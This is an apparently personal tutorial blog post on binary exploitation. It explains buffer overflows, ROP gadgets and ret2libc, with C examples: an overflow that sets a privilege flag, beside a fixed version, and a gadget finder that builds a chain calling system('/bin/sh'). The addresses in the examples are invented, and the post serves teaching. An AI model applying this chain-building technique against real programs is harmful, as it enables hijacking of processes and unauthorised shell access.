There are a lot of high-quality articles about pwn, but I want to share my experience, find my mistakes along the way and complete my knowledge. Enjoy.
🔧 work in progress
Referring to the ‘binary exploitation’ category, pwn is about exploiting weaknesses in low-level code: memory-safety bugs, for example a buffer overflow that corrupts memory when a program copies user input without checking its length against the size of the buffer.
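As an added example (not code from the original post), here is a minimal memory-corruption bug of the kind described above, beside its fix. The `struct session` layout, the `is_admin` flag and the 8-byte name buffer are all assumptions made up for the demonstration; the copy is done over the raw bytes of the struct so the overflow behaves the same on every compiler and stack layout.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hypothetical session record (constructed for this example): the fixed-size
 * name buffer sits directly before the privilege flag, so an unchecked copy
 * into `name` runs straight into `is_admin`. */
struct session {
    char name[8];
    int  is_admin;
};

/* Vulnerable: trusts the caller's length and never compares it with
 * sizeof(name). The copy starts at the first byte of the struct, so every
 * byte after the eighth lands in `is_admin`. */
void set_name_unchecked(struct session *s, const char *input, size_t len)
{
    memcpy((unsigned char *)s, input, len);   /* overflows name[] when len > 8 */
}

/* Hardened: rejects input that does not fit and always NUL-terminates.
 * Returns 0 on success, -1 when the input is too long. */
int set_name_checked(struct session *s, const char *input, size_t len)
{
    if (len >= sizeof s->name)
        return -1;                /* refuse instead of silently truncating */
    memcpy(s->name, input, len);
    s->name[len] = '\0';
    return 0;
}

/* Value of is_admin after copying `input` with the unchecked function into a
 * fresh, non-admin session. The cap on `len` only keeps this demo inside the
 * object; the bug is that nothing compares len with sizeof(name). */
int admin_after_unchecked(const char *input, size_t len)
{
    struct session s;
    memset(&s, 0, sizeof s);
    if (len > sizeof s)
        len = sizeof s;
    set_name_unchecked(&s, input, len);
    return s.is_admin;
}

/* Same experiment with the checked function: the flag must stay 0. */
int admin_after_checked(const char *input, size_t len)
{
    struct session s;
    memset(&s, 0, sizeof s);
    (void)set_name_checked(&s, input, len);
    return s.is_admin;
}

int main(void)
{
    /* Constructed input: 8 bytes of filler, then 4 bytes that overwrite the flag. */
    const char payload[] = "AAAAAAAA\x01\x01\x01\x01";
    printf("unchecked: is_admin = 0x%x\n", admin_after_unchecked(payload, 12));
    printf("checked:   is_admin = 0x%x\n", admin_after_checked(payload, 12));
    return 0;
}
```

The same pattern on the stack (a local `char buf[8]` filled by `gets()`) is what turns this from a privilege flag into control of the saved return address, which is where ROP starts.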
Re-write memory on the fly: the overflow overwrites whatever sits next to the buffer, including the saved return address on the stack.
Use ‘code’ already in the binary: chain small instruction sequences that end in `ret` (gadgets) to re-write data and load registers.
Use ROP to execute code: once the address of the libc the binary is linked against is known (from the binary’s imports, or from a leak when ASLR is on), jump to any libc function, for example system("/bin/sh"). Useful to get a shell (ret2libc).
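As an added example (not the post’s own code), the following block shows the two mechanical parts of a ret2libc chain: locating a `pop rdi ; ret` gadget by scanning code bytes, and laying the chain out in memory so that successive `ret`s consume it. The `TEXT` bytes, the load address `0x400000`, the padding of 24 bytes and the libc addresses are all constructed for the demo; in a real exploit they come from the target binary, a debugger and a libc leak.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed stand-in for a few bytes of a non-PIE binary's .text section:
 * short x86-64 instruction sequences ending in `ret` (0xc3). */
static const uint8_t TEXT[] = {
    0x48, 0x89, 0xc7,         /* mov rdi, rax                      */
    0xc3,                     /* ret                 (offset 3)    */
    0x90, 0x90,               /* nop ; nop                         */
    0x5f, 0xc3,               /* pop rdi ; ret       (offset 6)    */
    0x5e, 0xc3,               /* pop rsi ; ret       (offset 8)    */
    0x48, 0x31, 0xc0, 0xc3,   /* xor rax, rax ; ret  (offset 10)   */
};
#define TEXT_BASE 0x400000ULL   /* assumed load address of the binary (no PIE) */

/* Virtual address of the first occurrence of `pat` in TEXT, or 0 if absent.
 * Every byte offset is tried: on x86 a gadget may start in the middle of an
 * instruction the compiler emitted. */
uint64_t find_gadget(const uint8_t *pat, size_t n)
{
    for (size_t i = 0; i + n <= sizeof TEXT; i++)
        if (memcmp(TEXT + i, pat, n) == 0)
            return TEXT_BASE + i;
    return 0;
}

/* Append one 64-bit little-endian word; returns the new offset. */
static size_t push_qword(uint8_t *out, size_t off, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        out[off + i] = (uint8_t)(v >> (8 * i));
    return off + 8;
}

/* Read back a little-endian qword (used to inspect the chain). */
uint64_t read_qword(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)p[i] << (8 * i);
    return v;
}

/* Build  [pad filler][pop rdi ; ret][&"/bin/sh"][system]  into `out`.
 * `pad` is the distance from the overflowed buffer to the saved return
 * address (assumed known from debugging). Returns the chain length, or 0 if
 * no `pop rdi ; ret` gadget exists in TEXT. */
size_t build_ret2libc(uint8_t *out, size_t pad, uint64_t binsh, uint64_t system_addr)
{
    static const uint8_t pop_rdi_ret[] = { 0x5f, 0xc3 };
    uint64_t g = find_gadget(pop_rdi_ret, sizeof pop_rdi_ret);
    if (!g)
        return 0;
    memset(out, 'A', pad);                     /* filler up to the saved RIP     */
    size_t off = pad;
    off = push_qword(out, off, g);             /* saved RIP -> pop rdi ; ret     */
    off = push_qword(out, off, binsh);         /* popped into rdi by the gadget  */
    off = push_qword(out, off, system_addr);   /* gadget's ret lands in system() */
    return off;
}

int main(void)
{
    uint8_t chain[64];
    /* Constructed libc addresses standing in for a real leak. */
    size_t n = build_ret2libc(chain, 24, 0x7f0000001234ULL, 0x7f0000005678ULL);
    printf("chain length: %zu bytes\n", n);
    for (size_t off = 24; off < n; off += 8)
        printf("  +%zu: 0x%llx\n", off, (unsigned long long)read_qword(chain + off));
    return 0;
}
```

Two caveats a real target adds: with ASLR the libc addresses must be leaked at runtime before the chain is built, and on the SysV x86-64 ABI `system()` expects a 16-byte aligned stack at the call, so an extra `ret` gadget is often inserted before it.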